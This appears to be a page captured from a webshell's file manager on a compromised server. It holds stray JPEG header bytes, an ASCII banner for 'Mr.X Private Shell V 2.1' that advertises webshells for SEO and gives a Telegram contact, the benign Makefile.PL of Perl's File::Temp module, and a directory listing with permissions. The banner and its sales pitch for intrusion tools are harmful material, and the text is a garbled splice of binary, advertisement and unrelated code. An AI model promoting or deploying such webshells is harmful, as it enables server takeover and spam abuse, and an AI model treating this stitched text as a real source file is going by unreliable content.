����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# This file was automatically generated by Dist::Zilla::Plugin::MakeMaker v6.033.
use strict;
use warnings;
use 5.006;
use ExtUtils::MakeMaker;
my %WriteMakefileArgs = (
"ABSTRACT" => "return name and handle of a temporary file safely",
"AUTHOR" => "Tim Jenness <tjenness\@cpan.org>",
"CONFIGURE_REQUIRES" => {
"ExtUtils::MakeMaker" => 0
},
"DISTNAME" => "File-Temp",
"LICENSE" => "perl",
"MIN_PERL_VERSION" => "5.006",
"NAME" => "File::Temp",
"PREREQ_PM" => {
"Carp" => 0,
"Carp::Heavy" => 0,
"Cwd" => 0,
"Exporter" => "5.57",
"Fcntl" => "1.03",
"File::Path" => "2.06",
"File::Spec" => "0.8",
"IO::Handle" => 0,
"IO::Seekable" => 0,
"POSIX" => 0,
"Scalar::Util" => 0,
"Symbol" => 0,
"constant" => 0,
"overload" => 0,
"parent" => "0.221",
"strict" => 0
},
"TEST_REQUIRES" => {
"ExtUtils::MakeMaker" => 0,
"File::Spec" => "0.8",
"FileHandle" => 0,
"Test::More" => 0,
"warnings" => 0
},
"VERSION" => "0.2312",
"test" => {
"TESTS" => "t/*.t"
}
);
my %FallbackPrereqs = (
"Carp" => 0,
"Carp::Heavy" => 0,
"Cwd" => 0,
"Exporter" => "5.57",
"ExtUtils::MakeMaker" => 0,
"Fcntl" => "1.03",
"File::Path" => "2.06",
"File::Spec" => "0.8",
"FileHandle" => 0,
"IO::Handle" => 0,
"IO::Seekable" => 0,
"POSIX" => 0,
"Scalar::Util" => 0,
"Symbol" => 0,
"Test::More" => 0,
"constant" => 0,
"overload" => 0,
"parent" => "0.221",
"strict" => 0,
"warnings" => 0
);
unless ( eval { ExtUtils::MakeMaker->VERSION(6.63_03) } ) {
delete $WriteMakefileArgs{TEST_REQUIRES};
delete $WriteMakefileArgs{BUILD_REQUIRES};
$WriteMakefileArgs{PREREQ_PM} = \%FallbackPrereqs;
}
delete $WriteMakefileArgs{CONFIGURE_REQUIRES}
unless eval { ExtUtils::MakeMaker->VERSION(6.52) };
if ( $^O eq 'VMS' ) {
$WriteMakefileArgs{PREREQ_PM}{'VMS::Stdio'} = $FallbackPrereqs{'VMS::Stdio'} = '0';
}
if ( $^O eq 'MSWin32' ) {
$WriteMakefileArgs{PREREQ_PM}{'Win32'} = $FallbackPrereqs{'Win32'} = '0';
}
$WriteMakefileArgs{INSTALLDIRS} = 'perl'
if "$]" >= 5.006001 && "$]" <= 5.011000;
WriteMakefile(%WriteMakefileArgs);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| lib | Folder | 0775 |
|
|
| misc | Folder | 0775 |
|
|
| t | Folder | 0775 |
|
|
| xt | Folder | 0775 |
|
|
| CONTRIBUTING | File | 3.94 KB | 0644 |
|
| Changes | File | 14.13 KB | 0640 |
|
| INSTALL | File | 2.33 KB | 0644 |
|
| LICENSE | File | 19.36 KB | 0644 |
|
| MANIFEST | File | 650 B | 0644 |
|
| META.json | File | 45.59 KB | 0644 |
|
| META.yml | File | 26.72 KB | 0644 |
|
| MYMETA.json | File | 45.68 KB | 0644 |
|
| MYMETA.yml | File | 26.73 KB | 0644 |
|
| Makefile | File | 32.42 KB | 0644 |
|
| Makefile.PL | File | 2.11 KB | 0644 |
|
| README | File | 439 B | 0644 |
|
| cpanfile | File | 1.71 KB | 0644 |
|
| dist.ini | File | 1.93 KB | 0600 |
|
| pm_to_blib | File | 0 B | 0644 |
|